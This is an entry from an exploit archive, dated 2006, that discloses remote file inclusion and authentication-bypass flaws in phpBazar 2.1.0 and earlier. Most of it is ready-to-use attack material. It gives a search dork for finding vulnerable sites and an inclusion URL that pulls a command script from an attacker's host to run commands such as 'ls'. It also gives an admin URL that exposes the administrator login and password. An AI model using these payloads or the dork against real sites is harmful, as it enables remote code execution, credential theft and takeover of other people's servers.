[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities
# Published : 2006-05-19
# Author : [Oo]
# Previous Title : phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit
# Next Title : Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# www.Syue.com [2006-05-19]